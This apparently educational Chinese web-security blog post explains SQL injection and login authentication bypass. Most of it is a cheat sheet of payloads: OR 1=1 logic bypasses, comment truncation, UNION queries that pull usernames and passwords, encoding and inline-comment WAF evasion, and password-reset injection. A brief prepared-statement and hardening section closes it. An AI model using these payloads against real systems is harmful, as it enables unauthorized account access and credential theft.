【web安全】SQL注入与认证绕过

目录

一、SQL注入漏洞

[1.1 基础注入原理](#1.1 基础注入原理)

[1.2 实用注入Payload分类](#1.2 实用注入Payload分类)

逻辑绕过型

注释截断型

联合查询型

常见的万能密码-CSDN博客

二、登录绕过实战技巧

[2.1 基础绕过手法](#2.1 基础绕过手法)

[2.2 高级绕过技巧](#2.2 高级绕过技巧)

编码绕过

多重注释

参数污染

三、密码重置漏洞利用

[3.1 常见漏洞模式](#3.1 常见漏洞模式)

[3.2 实用Payload](#3.2 实用Payload)

四、防御方案精要

[4.1 开发防护](#4.1 开发防护)

[4.2 运维加固](#4.2 运维加固)

速查表


一、SQL注入漏洞

1.1 基础注入原理

SQL注入是通过构造特殊输入改变原始SQL语句逻辑的攻击方式。典型攻击模式:

sql 复制代码
原始语句:SELECT * FROM users WHERE username='[输入]' AND password='[输入]'
注入后: SELECT * FROM users WHERE username='admin'--' AND password='xxx'

1.2 实用注入Payload分类

逻辑绕过型
sql 复制代码
' OR 1=1 --
" OR "a"="a
' OR '1'='1
注释截断型
sql 复制代码
admin'#
admin'/*
admin'--
联合查询型
sql 复制代码
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--

常见的万能密码-CSDN博客

二、登录绕过实战技巧

2.1 基础绕过手法

sql 复制代码
admin' OR '1'='1
admin'--
admin'/*

2.2 高级绕过技巧

编码绕过
sql 复制代码
admin%27%20OR%201%3D1--
多重注释
sql 复制代码
admin'/*!OR*/1=1--
参数污染
sql 复制代码
username=admin'--&username=realuser

三、密码重置漏洞利用

3.1 常见漏洞模式

sql 复制代码
UPDATE users SET password='[新密码]' WHERE username='[输入]'
注入: UPDATE users SET password='hacked' WHERE username='admin'--'

3.2 实用Payload

sql 复制代码
admin'--
' OR email='admin@example.com
' OR 1=1 LIMIT 1--

四、防御方案精要

4.1 开发防护

sql 复制代码
// 使用预编译语句
String sql = "SELECT * FROM users WHERE username=?";
PreparedStatement stmt = conn.prepareStatement(sql);
stmt.setString(1, username);

4.2 运维加固

  1. 启用WAF规则过滤特殊字符

  2. 限制数据库账号权限

  3. 开启SQL执行日志审计

相关推荐
赵渝强老师6 小时前
【赵渝强老师】MySQL数据库的多实例环境
数据库·sql·mysql
长城20246 小时前
关于命名参数占位符的分析(主要以PHP为例)
sql·php·占位符·命名参数占位符·bindparam
Xasxxs7 小时前
【网络安全】WAF Bypass——长亭雷池、安全狗下的SQL绕过
数据库·sql·安全·web安全·网络安全·php
九河云10 小时前
AI+云,双擎驱动——华为云让智能触手可及
网络·人工智能·科技·安全·华为云
zezexihaha12 小时前
AI 安全与伦理:当大模型拥有 “决策能力”,我们该如何建立技术边界与监管框架?
人工智能·安全
墨染 殇雪12 小时前
web安全-XSS注入
前端·web安全·xss·跨站脚本
Clownseven12 小时前
堡垒机(跳板机)入门指南:构建更安全的多服务器运维架构
运维·服务器·安全
网络安全大学堂13 小时前
【网络安全入门基础教程】网络安全就业方向(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·网络安全·程序员·编程
你那是什么调调14 小时前
MySQL 中 InnoDB 引擎的事务隔离级别与“可重复读”隔离级别下的 SQL 编写规范
数据库·sql·mysql
DemonAvenger15 小时前
主从复制架构:原理与搭建详解——从入门到实战
数据库·sql·性能优化